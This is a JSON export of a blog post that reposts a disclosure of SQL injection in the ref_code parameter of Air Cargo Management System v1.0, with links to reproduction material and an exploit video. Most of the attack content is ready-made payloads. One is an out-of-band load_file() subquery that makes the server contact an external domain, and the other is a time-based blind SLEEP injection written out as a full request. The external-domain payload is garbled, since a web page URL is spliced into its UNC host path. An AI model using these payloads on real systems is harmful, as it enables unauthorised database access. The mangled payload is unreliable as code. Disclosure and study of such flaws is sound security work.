## Title: Air Cargo Management System v1.0 remote SQL-Injections
\n## Author: nu11secur1ty
\n## Date: 02.18.2022
\n## Vendor: https:\/\/www.sourcecodester.com\/users\/tips23
\n## Software: https:\/\/www.sourcecodester.com\/php\/15188\/air-cargo-management-system-php-oop-free-source-code.html
\n## CVE – Air Cargo Management Systemv1.0<\/p>\n
## Description:
\nThe `ref_code` parameter from Air Cargo Management System v1.0 appears
\nto be vulnerable to SQL injection attacks.
\nThe payload ‘+(select
\nload_file(‘\\\\\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https:\/\/www.sourcecodester.com\/php\/15188\/air-cargo-management-system-php-oop-free-source-code.html\\\\hag’))+’
\nwas submitted in the ref_code parameter.
\nThis payload injects a SQL sub-query that calls MySQL’s load_file
\nfunction with a UNC file path that references a URL on an external
\ndomain.
\nThe application interacted with that domain, indicating that the
\ninjected SQL query was executed.
\nWARNING: If this is in some external domain, or some subdomain
\nredirection, or internal whatever, this will be extremely dangerous!
\nStatus: CRITICAL<\/p>\n
[+] Payloads:<\/p>\n
“`mysql
\n—
\nParameter: ref_code (GET)
\nType: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: p=trace&ref_code=258044’+(select
\nload_file(‘\\\\\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https:\/\/www.sourcecodester.com\/php\/15188\/air-cargo-management-system-php-oop-free-source-code.html\\\\hag’))+”
\nAND (SELECT 9012 FROM (SELECT(SLEEP(3)))xEdD) AND ‘JVki’=’JVki
\n—<\/p>\n
“`
\n## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/blob\/main\/vendors\/oretnom23\/2022\/Air-Cargo-Management-System)<\/p>\n
## Proof and Exploit:
\n[href](https:\/\/streamable.com\/ekn92z)<\/p>\n","protected":false},"excerpt":{"rendered":"
## Title: Air Cargo Management System v1.0 remote SQL-Injections ## Author: nu11secur1ty ## Date: 02.18.2022 ## Vendor: https:\/\/www.sourcecodester.com\/users\/tips23 ## Software: https:\/\/www.sourcecodester.com\/php\/15188\/air-cargo-management-system-php-oop-free-source-code.html ## CVE – Air Cargo Management Systemv1.0 ## Description: The `ref_code` parameter from Air Cargo Management System v1.0 appears to be vulnerable to SQL injection attacks. The payload ‘+(select load_file(‘\\\\\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https:\/\/www.sourcecodester.com\/php\/15188\/air-cargo-management-system-php-oop-free-source-code.html\\\\hag’))+’ was submitted in the …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-20979","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20979","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=20979"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20979\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=20979"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=20979"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=20979"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}